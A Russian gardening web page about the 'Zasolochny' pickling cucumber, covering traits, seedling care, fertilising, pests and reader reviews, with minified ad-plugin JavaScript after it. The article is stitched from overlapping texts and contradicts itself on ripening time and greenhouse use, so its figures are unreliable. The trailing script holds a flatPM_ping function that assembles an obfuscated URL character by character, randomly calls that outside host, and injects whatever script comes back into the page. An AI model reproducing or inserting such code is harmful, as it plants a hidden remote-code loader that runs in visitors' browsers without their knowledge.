0 просмотров
Рейтинг статьи
1 звезда 2 звезды 3 звезды 4 звезды 5 звезд
Загрузка...

Характеристика огурцов сорта засолочный

Огурец «Засолочный F1»

Огурец сорта Засолочный F1 – это овощная культура с ранним сроком созревания. На невысоких кустах красуются ровные крупнобугорчатые корнишоны с плотной хрустящей мякотью. Огурец устойчив к погодным стрессам и ложной мучнистой росе. Ровные аккуратные плоды подходят для консервирования в банках.

Огурец Засолочный f1: описание сорта

Огурец посевной характеризуется коротким сроком вегетации – всего 30 – 35 дней. Инкрустация семян микро- и макроэлементами повышает показатели всхожести и урожайности на 7 и 15 % соответственно. Инкрустирование представляет собой технологический процесс, в ходе которого семена помещаются в оболочку из органических и неорганических веществ. Эти соединения защищают посадочный материал от инфекций и стимулируют рост огуречных насаждений.

Сорт огурца «Засолочный F1» опыляется пчелами. Длинноплетистая культура подходит для грунтового выращивания. На открытой местности она за пару месяцев формирует бугорчатые плоды без горечи. Длина каждого зеленца достигает 13 см, а вес – 120 г. Форма плодов удлиненная цилиндрическая, яйцевидного типа. Опушение черное, цвет темно-зеленый. Вкусовые и товарные качества овощей высокие. Даже в перезревшем состоянии они не склонны к быстрому пожелтению.

Выращивание и уход за огурцом засолочным f1

Сорт огурец Засолочный f1 предпочтительно высаживать на среднесуглинистых воздухопроницаемых почвах. Для более успешного выращивания желательно выбирать участки, где ранее культивировался картофель, перец, лук или капуста. В этом случае полезные вещества передадутся новым насаждениям.

На рассаду семена засолочного огурца садят в апреле, погружая на глубину 1.5 – 2 см. Посадочную тару накрывают полиэтиленовой пленкой и не снимают до появления первых всходов. Тепличные условия поддерживают постоянно, обеспечивая в помещении температуру +22 – 25 градусов.

«Тепличку» разбирают с появлением зеленой массы. Температурный режим понижают до +15°C и на таком уровне его поддерживают в течение недели. С 8-го дня температуру вновь повышают и выставляют всходы на хорошо освещенное место. Пикировку не делают.

Если почва на момент пересадки прогрелась до +14°C и выше, окрепшие кустики перемещают на открытые грядки или в теплицу. В первое время саженцы укрывают пленкой на ночь. Схему посадки для засолочного огурца соблюдают 60 х 15 см.

По мере необходимости грядки разрыхляют, пропалывают и поливают. Подкормки вносят, используя комплексные минеральные удобрения с водорастворимой структурой. Поливают огуречные кусты после заката теплой отстоявшейся под солнцем водой. Дневной полив в жаркую погоду опасен для растений солнечными ожогами.

Для получения максимально объёмного урожая в течение сезона зеленцы своевременно снимают, не допуская перезревания на кустах. Средняя урожайность огурца сорта засолочный f1 варьируется в пределах 114 – 226 центнер для одного гектара. Доля товарной продукции в собранном урожае составляет 94 – 96 %.

Как использовать огурец

Несмотря на определение «засолочный», этот сорт огурца находит свое применение в приготовлении закусок. Зеленцы отлично сочетаются с другими овощами, зеленью, мясом, морепродуктами, птицей, рисом. Огуречную нарезку сдабривают зеленью, растительным маслом, специями, перцем и чесноком.

Оригинальную закуску из огурцов засолочного сорта f1 можно приготовить, разрезав плоды вдоль и смазав половинки тоненьким слоем аджики. Пестрое сочное блюдо прекрасно освежает в летний зной и является приятной закуской при употреблении спиртных напитков.

Сорт Засолочный огурец и другие сорта на засолку

Большинство огородников пытаются приготовить к зимнему сезону столько огурцов, сколько они выращивают, чтобы были они вкусными, хрустящим и красивым на столе. Огурец Засолочный отлично подходит для этих характеристик.

Описание сорта

Он предназначен для выращивания на открытых грунтах. Для того, чтобы завязи образовывались на кустах, опыление насекомыми является обязательным, поэтому выращивать его в тепличных условиях довольно сложно. Этот сорт огурца:

  • Хорошо переносит небольшое затенение.
  • Устойчив к большинству известных заболеваний, которые могут влиять на огурцы.
  • Среднераннее созревание. Первый урожай можно собрать через 40-45 дней после того, как семена всходят. Обычно эти условия выпадают на июль-август.
  • Имеет стабильный хороший урожай — 4-5 кг/м²;
  • Стебли длинные, с неограниченным ростом. Плоды имеют цилиндрическую форму. Их цвет темно-зеленый, с белыми полосками. На тонкой, тонкой коже появляются крупные пупырышки.

Перед заготовкой огурцов на зиму обратите внимание на их шипы — если они белые, то огурцы могут потребляться только свежими, а если черные, то этот вид предназначен только для соленья.

Длина плода 9-14 см, вес 100-120 г. У них выраженный вкус и запах, без горечи. При мариновании и засолке огурцы очень вкусные, хрустящие и аппетитные.

Особенности выращивания

Огурец сорта Засолочный f1 предпочтительно высаживать на среднесуглинистых воздухопроницаемых почвах. Для более успешного культивирования желательно выбирать районы, где раньше выращивали картофель, перец, лук или капусту. В этом случае полезные вещества будут перенесены на новые плантации.

Уход за рассадой

На рассаде семена засолочных огурцов высаживают в апреле, погружая на глубину 1,5-2 см. Посадочный контейнер покрывается полиэтиленовой пленкой и не удаляется до появления первых побегов. Тепличные условия сохраняются постоянными, обеспечивая комнатную температуру +22-25 градусов. «Теплицу» разбирают с появлением зеленой массы.

Температурный режим понижается до + 15 °C и на этом уровне поддерживается в течение недели. С 8-го дня температура снова поднимается, и побеги подвергаются воздействию хорошо освещенного места. Пикировку не делают. Если почва во время пересадки прогрелась до + 14 °C и выше.

  • Укрепленные кусты перемещаются на открытые грядки или в теплицу.
  • Сначала саженцы покрыты пленкой на ночь.
  • Схема посадки засолочных огурцов составляет 60х15 см.

Ухаживать за огурцом просто:

  1. По мере необходимости грядки разрыхляются, пропалываются и поливаются.
  2. Удобрения применяются с использованием сложных минеральных удобрений с водорастворимой структурой.
  3. Полейте кусты огурца после захода солнца теплой водой, отстоянной на солнце.
  4. Дневной полив в жаркую погоду опасен для растений ожогами.
  5. Чтобы получить максимальный объем урожая в течение сезона, зелень удаляется своевременно, не допуская перезревания кустов. Средняя урожайность огурца Засолочный f1 колеблется от 114 до 226 центнеров с гектара. Доля товарной продукции в урожае составляет 94-96%.

Болезни и вредители

Как всем известно, различные огородные культуры склонны к тем или иным заболеваниям. Как правильно ухаживать за побегами огурцов — их враги не дремлют.

Основные из них:

  • Паутинный клещ может нанести значительный ущерб саженцам, питающимся растительным соком. Как только пятна появляются на листьях овощей, а на нижней стороне их полотна, необходимо опрыскивать побеги инсектицидами.
  • Белокрылка может убить все саженцы огурцов. Эффективно помогает в этом случае, подвешенный рядом картонный короб, смоченный канифолью медом, маслом. Насекомые просто прилипают к листу и умирают.
  • Мучнистая роса, характеризующаяся белым покрытием на листьях. Как правило, грибковая болезнь проявляется при резких изменениях температуры воздуха. Опрыскивание с помощью фунгицидов, таких как Topsin, эффективно спасает пораженные растения. Чтобы предотвратить заражение грибком, перед посевом растительную почву необходимо пролить раствором перманганата калия. Контроль над побегами огурцов поможет своевременно заметить поражение их болезни и вредителей и помочь им быстро справиться.

Эффективный метод борьбы с насекомыми — опрыскивание настоем тысячелистника, конского каштана. И эти вредители не могли атаковать саженцы огурцов, их иногда опрыскивали холодной водой. С высокой влажностью, чрезмерным поливом, будут затронуты огурцы тлей, которые быстро увеличивают их популяцию. Опрыскивание саженцев мыльным раствором, настойка табака является хорошей профилактической мерой против этого вредителя.

На фото можно увидеть огурец Засолочный.

Другие лучшие засолочные сорта огурцов

Классическими для засолки и консервирования являются такие разновидности, как:

  1. «Нежинский». Опытные огородники считают, что это лучший сорт. Он устойчив к болезням и не требует внимания, опыляется насекомыми.
  2. «Конкурент» относится к ранним сортам, плоды растут до 12 см.
  3. «Ерофей». Это универсальный сорт со смешанным типом цветения, мелкие плоды (6-7 см), бугорчатые.

А также подойдут такие сорта: «Эра», «Стадия», «Носовский», «Муромский», «Каскад», «Весна», «Большой».

По внешнему виду огурцы любого из этих сортов обладают всеми качествами «засолочных»: среднего размера, тонкой кожи и довольно плотной мякоти. В маринованной и соленой форме эти огурцы крепкие и хрустящие. Дополнительным преимуществом является возможность получения качественных семян.

Огурцы для открытого грунта самоопыляются для засолки: Зозуля, Задор, Альянс. Любители очень маленьких консервированных огурцов могут вырастить «Парижский корнишон» или «Лилипут». Они очень плодотворны, обладают отличными вкусовыми качествами.

Для тех, чья территория мало освещена солнцем, лучшими сортами огурцов для засолки могут быть:

  1. «Муромский 36» — небольшие светло-зеленые огурцы (длина 6-8 см), устойчивые к кратковременному понижению температуры воздуха.
  2. «Секрет компании F1» и «Подмосковные вечера F1» — универсальные сорта с плодами среднего размера.

Видео

На видео рассказывается о выборе огурцов для засолки.

Характеристика огурцов сорта Засолочный

Сложно представить зимние заготовки без ароматных, консервированных огурцов. И если в свежем виде все они похожи по вкусу и не особо отличаются друг от друга, то для засолки и консервации подходят не все виды. Сорт огурцов Засолочный говорит сам за себя.

Характеристика огурцов сорта Засолочный

Селекционеры вывели эту разновидность специально для солений. Он хорошо плодоносит, вкусный в свежем виде и отлично подходит для зимних заготовок. Огурец сорта Засолочный есть в характеристике лучших видов для выращивания в открытом грунте.

Характеристика сорта

Огурец сорта Засолочный относится к среднеспелому виду. От всходов до первого плодоношения проходит в среднем 55-60 дней. Выращивают его в условиях открытого грунта, поскольку растению требуется опыление. Для выращивания в теплице он не подходит. Характеристика и описание огурца Засолочного:

  • требует опыления;
  • всхожесть семян 95 — 98%;
  • плодоносить начинает через 55 — 60 дней после всходов;
  • высокая устойчивость к заболеваниям;
  • стабильная урожайность 4–5 кг/м²;
  • неприхотлив к грунтам и погоде.

Выращивание огурца Засолочный начинается с посева семян. Для получения более раннего урожая огурцов, его в конце апреля сеют под пленку. Когда прорастут первые ростки, пленку снимают. Стандартные сроки посева – середина-конец мая. К этому времени минует угроза заморозков и грунт хорошо прогреется. Оптимальной температурой земли для всходов и хорошего роста является 15 С°.

Описание куста

Кусты начинают плодоносить к концу июля, началу августа, плетутся сильно. Имеют большие зеленые листья и длинные стебли. Цветки смешанного типа, требуют опыления насекомыми. Семена отличаются хорошей всхожестью, а само растение выносливостью и длительным периодом плодоношения. Подвязки не требуют.

Описание плодов

Отличительной чертой огурца Засолочный являются зеленцы примерно одинакового размера и правильной цилиндрической формы. Плоды имеют приятный вкус как в свежем виде, так и в консервациях. Описание огурца сорта Засолочный:

  • средний вес 100-120 грамм;
  • длина от 10 см до 13 см;
  • повышенное содержание витаминов;
  • горечь отсутствует.

При правильном уходе плоды имеют одинаковый вес. Кожа у зеленцов тонкая, темно-зеленого цвета. Бугры крупные с черными шипами на концах. Плоды долго сохраняют цвет и не желтеют, даже после снятия и хранения в помещении.

Несмотря на название эти огурцы хороши как в свежем виде в салатах, так и в зимних заготовках. Мякоть ароматная, хрустящая, семечки мелкие. Пустоты отсутствуют. Для получения наибольшего урожая зеленцы снимают в фазе технической спелости, не давая им перерасти. Техническая спелость наступает, когда плод достигает примерно 9 см в длину. Чем дольше зеленец будет находиться на грядке, тем больше он вырастет и станет менее пригодным для заготовок. Собирать урожай следует каждые 2 — 3 дня. Более частый сбор урожая стимулирует растение к обильному и длительному плодоношению.

Уход за растение не добавит вам хлопот

Вид Засолочный достаточно неприхотлив как к качеству грунта, на котором растет, так и к погодным условиям. Вырастить его под силу и неопытному огороднику. Для длительного плодоношения и хорошего урожая требуется соблюдение некоторых правил:

  1. Под посадку выбирают хорошо освещенные участки, избегая затемненных мест.
  2. Сорняки лучше вырывать руками, землю рыхлить аккуратно, не затрагивая прикорневой зоны.
  3. Регулярный полив способствует формированию плодов правильной формы и отличного вкуса.
  4. Обязательно кусты нужно подкармливать, так как недостаток минеральных элементов способствуют ухудшению роста и сопротивляемости болезням.
  5. При появлении первых признаков заболевания или обнаружении вредителей, нужно сразу применять меры по их устранению.

Выбор места

Оптимальным местом для посадки считаются те участки, где ранее были картофель, капуста, перец, помидоры. Они обогащают почву определенными элементами, необходимыми для правильного роста плода.

Полив

Для полива используют отстоянную воду. Поливать следует вечером под корень, чтобы избежать возможных ожогов на листья.

Подкормка

Подкармливать не стоит часто. Достаточно 2, максимум 3 подкормки за весь период вегетации. Лучше всего применять органические удобрения — 250 гр помета на 5 л теплой воды. Смесь использовать вкачестве жидкости для полива кустов.

Подвязка

Так как растение пускает длинные побеги, то вопрос подвязывания — дело индивидуальное.

Куст хорошо растет и на шпалерах, и просто плетясь по земле. Для привлечения насекомых проводят опрыскивание раствором сахара и воды: 1 ч. л. сахара на 1 л воды. Если растение слабо пускает боковые побеги, то верхний, главный стебель нужно прищипнуть над последним листом.

Болезни и вредители

Огурец Засолочный имеет хорошую устойчивость к типичным заболеваниям. Избыток влаги может спровоцировать загнивание корней, листьев. В таких случаях поливы прекращают, пораженные места присыпают золой, листья и стебли приподнимают, улучшая циркуляцию воздуха.

Самые лучшие засолочные сорта огурцов

Добавление статьи в новую подборку

Далеко не все сорта огурцов пригодны для засолки. Чтобы зимой получить плотный хрустящий соленый огурчик, необходимо правильно и вдумчиво выбрать исходный продукт для консервации.

Какие огурцы лучше всего подходят для консервирования, читайте в нашем материале.

Классификация огурцов

Условно сорта огурцов делят на три вида: салатные, засолочные и универсальные. Салатные – самые ранние, их выращивают в теплицах или под пленкой. Они имеют удлиненную форму (до 20 см), тонкую кожицу и нейтральный вкус. Их мякоть сочная, но совершенно неплотная.

Такие огурцы идеальны для приготовления свежих салатов, но совершенно не пригодны для засолки. Отважившись на консервацию салатных огурцов, вы, скорее всего, получите мягкий и безвкусный продукт.

Универсальные сорта огурцов выращивают как в теплицах, так и в открытом грунте. Такие огурцы имеют правильную продолговатую форму, кожицу и мякоть средней плотности. Длина плода − 8-11 см.

Универсальные сорта огурцов можно использовать как для столовых нужд, так и для засолки. Их кожица достаточно тонкая, чтобы пропустить солевой раствор, но особого хрустящего вкуса вы не получите.

Идеальным вариантом для зимней консервации являются сорта засолочных огурцов. Они обладают тонкой кожицей и упругой мякотью, которая под воздействием соли приобретает столь желанный хруст и ярко выраженный вкус.

Как выбрать огурец для засолки?

По внешним признакам отличить засолочный огурец от салатного или универсального достаточно просто. Плоды, пригодные для засолки, имеют небольшую длину (до 8 см), а их поверхность − сильнобугорчатая с черными шипами.

Цвет шипов на огурце имеет весомое значение. Существуют белошипые сорта, которые совершенно не пригодны для засолки. У них грубая и толстая кожура, малопроницаемая для раствора соли. А вот у плодов с черными шипами кожица, наоборот, тонкая и пористая, что делает их идеальными для заготовок на зиму.

На засолку лучше всего брать огурцы засолочных сортов

Главное качество засолочного огурца – плотность его мякоти. Крупнобугорчатые огурцы с черными шипами имеют во внутреннем строении поперечные сосудистые пучки, которые и придают плодам желанную плотность и хрусткость.

Лучшие сорта для засолки

К классическим засолочным сортам с хорошей урожайностью относятся:

Данные сорта дают прекрасные огурцы среднего размера (6-8 см), с тонкой кожицей и упругой мякотью. Также, в сравнении с гибридными сортами, они позволяют собирать хороший семенной материал.

По сравнению с гибридами засолочные сорта дают хорошие семена

Единственным их недостатком можно назвать склонность к раннему желтению плодов. Поэтому урожай с таких сортов нужно собирать регулярно и вовремя, тем самым не только получая отличный продукт для засолки, но и стимулируя образование новых завязей на кусте.

В последнее время выведено множество гибридов, которые пригодны для засолки:

Все эти виды огурцов являются гибридами, а их плоды обладают отличными засолочными и вкусовыми качествами. Сами растения устойчивы к большинству заболеваний, легко переносят временную засуху и неприхотливы в уходе.

Правильно выбирайте сорта огурцов на засолку, и у вас получатся самые вкусные заготовки, которые так приятно будет открыть холодной зимой.

Огурцы сорта Засолочный: секреты выращивания

Солёные огурцы — одна из самых популярных закусок на наших столах. Неудивительно, что отечественные селекционеры решили вывести сорт, оптимально подходящий для засолки на зиму.

Описание огурцов сорта Засолочный

Огурец сорта Засолочный выведен на Волгоградской опытной станции имени Н. И. Вавилова в 1999 году. Это относительно молодой сорт. Засолочный имеет официальный статус и включён в Государственный реестр селекционных достижений РФ по Центрально-чернозёмному и Нижневолжскому регионам. Засолочный — раннеспелый огурец. Урожай собирают уже через 40–45 дней после появления первых всходов, обычно в конце июля. Урожайность составляет 1,2–2,9 кг/м.

Черные шипы — признак засолочных сортов

Плоды некрупные: длина 9–14 см, диаметр 3,5–4 см, вес около 100–130 грамм. Огурчики имеют идеальный размер для классического посола, отлично подходят для салатов. Окраска плодов тёмно-зелёная. Шипы чёрного цвета, что является признаком огурцов, подходящих для заготовки на зиму. Семечки мелкие. Плоды хорошо хранятся даже на подоконнике, подолгу не желтеют.

Огурец — уникальная культура. Это единственное растение, чьи плоды мы употребляем в пищу только недозрелыми.

Семена Засолочного огурца обладают отличной всхожестью — около 95%. Далеко не все сорта огурцов могут похвастаться таким отличным показателем. Сопротивляемость заболеваниям у сорта средняя.

Видео: описание сорта огурцов Засолочный

Таблица: плюсы и минусы огурцов сорта Засолочный

Преимущества Недостатки
Раннеспелый сорт Нельзя выращивать в теплицах
Оптимальный размер для засолки
Плоды подолгу не желтеют, никогда не горчат
Устойчив к большинству заболеваний
Всхожесть семян до 95%

Выращивание в открытом грунте

На рассаду семена огурцов высаживают примерно за месяц до высадки в открытый грунт. В центральной и средней полосе России это обычно начало или середина апреля, в Сибири и на Дальнем Востоке — середина и конец этого месяца.

Рассадный способ

В качестве ёмкости под рассаду огурцов лучше всего использовать торфяные горшочки, но подойдут и классические пластиковые стаканчики объёмом 300 мл. Только не забудьте сделать отверстие в донышке, иначе избыток влаги погубит рассаду. В качестве грунта подойдёт садовая земля с добавлением органических удобрений. Для профилактики различного рода заболеваний землю рекомендуется предварительно прокалить в духовке. Влажную почву помещают в стаканчик, сверху кладут семечко. Всегда есть вероятность, что взойдут не все семена, поэтому лучше класть сразу несколько. Сверху семена присыпают 1–2 мм грунта.

Часто для посадки используют уже пророщенные семена огурцов. Это позволит сразу отбраковать некачественный посадочный материал. Для этого семена выкладывают на ватный диск или марлю, обильно смачивают водой и оставляют при комнатной температуре. Важно следить, чтобы ватный диск оставался влажным. Всходы появляются через 2–5 дней.

Семена огурцов всходят на 2–5-е сутки

Теперь ёмкости с семенами ставим на подоконник и ждём первых всходов. Для сохранения влажности стаканчики помещают в полиэтиленовый пакет до появления проростков. Если в одном стаканчике взошло более одного ростка, то второй проросток придётся срезать. Вырывать его не рекомендуется, так как пострадает корневая система будущего саженца.

Оптимальный температурный режим для рассады огурцов:

  • в солнечную погоду — 22–25 °С;
  • в пасмурную погоду — 20–22 °С;
  • ночью — 16–18 °С.

Весной световой день удлиняется, тем не менее рассада будет более жизнеспособной, если её подсвечивать специальными люминесцентными лампами 10–12 часов в сутки.

Видео: как правильно вырастить рассаду огурцов

За 5–7 дней до высадки рассаду огурцов начинают закаливать, вынося на балкон или улицу, при этом перепад температур не должен составлять более 8 градусов.

Высадку огурцов производят в середине или конце мая

Оптимальные размеры рассады огурцов для высадки в открытый грунт: 20–25 см высотой, диаметр стебля 7–8 мм, 3–5 настоящих листьев, возможно наличие первого усика.

Высаживается рассада Засолочного огурца в открытый грунт в середине или конце мая. Для этого проделывают следующее:

    Предварительно выкапывают ямки глубиной в 30–40 см.

Под посадку выбирают хорошо освещенные участки, избегая затемнённых мест

Перегной вносят в грунт по 4–6 кг на квадратный метр

Если огурец выращен в стаканчике, переверните его и, придерживая рукой стебель, аккуратно снимите с кома земли

Растения заглубляют в почву до семядольных листочков

Растущие без подвязки огурцы пытаются сами найти опору и в результате ломаются и высыхают

Безрассадный способ

Засолочный огурец также можно высаживать и напрямую — в почву безрассадным способом. Для этого необходимо, чтобы весеннее солнце прогрело почву до 12–15 °С (конец мая).

В качестве нити для подвязки лучше всего использовать джутовый шпагат. Он не такой скользкий, как капроновый или полипропиленовый.

После высадки в период активного роста огурцы необходимо подкармливать удобрениями, содержащими азот. Традиционный вариант — настой из свежего навоза или птичьего помёта в соотношении 1:5. Удобрять огурцы лучше всего в пасмурную погоду или в вечернее или утреннее время.

Во время цветения предпочтение нужно отдавать калийным удобрениям, это поможет сформироваться плодам. Для этого в 10 литрах воды замешивают:

  • 200 г коровяка;
  • 1 ч. л. суперфосфата;
  • 1 ч. л. сульфата калия.

Огурцы особенно остро нуждаются в калии в период цветения

Во время плодоношения растению снова потребуется больше азота, а также калий, магний и кальций. Самое время подкормить огурцы раствором мочевины из расчёта 50 г на 10 л воды. Также в этот период дополнительно стимулируют рост плодов с помощью травяного настоя. Для этого скошенную траву заливают водой 1:1, а через неделю разбавляют до 1:5.

Видео: 5 лучших подкормок для огурцов

Дальнейшее выращивание огурцов

Правильное формирование плетей поможет собрать максимально возможный урожай огурцов. Плети Засолочного огурца формируются по многостеблевому принципу, потому что у пчелоопыляемых сортов возле центрального стебля сосредоточены мужские цветки — пустоцветы, а на боковых — женские, дающие урожай. При этом сами плети ветвиться не хотят, для этого их надо прищипывать на уровне 4–6 листа. Это спровоцирует развитие боковых плетей с плодами. Боковые плети также необходимо подвязать под углом более 60 градусов, чтобы они не мешали центральному побегу.

На протяжении всего вегетационного периода не забывайте удалять лишние усы, чтобы избежать чрезмерного загущения. Когда центральная плеть доберётся до верхнего конца проволоки, её несколько раз обматывают вокруг шпалеры и прищипывают верхушку.

Первые огурцы появляются на кусте уже через полтора месяца после высадки рассады в открытый грунт в середине июля. Засолочный активно даёт урожай приблизительно за 20–25 дней.

Видео: секреты огородников по выращиванию огурцов

Отзывы опытных садоводов об огурцах сорта Засолочный

В выращивании огурцы весьма неприхотливы, не требуют какого-то особенного специального ухода. Я делала «огуречную ёлочку», чтобы потом легче было собирать урожай. Огурчики вырастают крупных размеров. Для засолки действительно очень хороший сорт. Солёные огурчики получаются хрустящими, в меру кислыми, точнее с небольшой кислинкой. Хранятся банки с огурцами хорошо. Даже и на следующий год можно оставить. Если хранить в подвале, то вкусовые качества солёных огурцов сохраняются пару лет.

Tasha19

https://otzovik.com/review_4870119.html

Идеаьный сорт огурцов для засолки. Я в основном не консервирую, а солю в дубовой бочечке. Огурцы очень вкусные получаются, не такие, как из банки.

Игорь Андреевич

Источник: https://semena.biz.ua/ogirok/28594/reviews/.

Выбрал этот сорт специально для засолки. В сельской местности в основном огурцы солят в дубовые бочечки. Еще не пробовали соленых огурцов, но свежие не плохие.

Станислав

https://semena.biz.ua/ogirok/28594/reviews

Огурец Засолочный отлично подходит для заготовки на зиму. Этот сорт хорошо зарекомендовал себя у садоводов-огородников благодаря простоте в уходе, вкусовым качествам, лежкости и высокой урожайности.

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};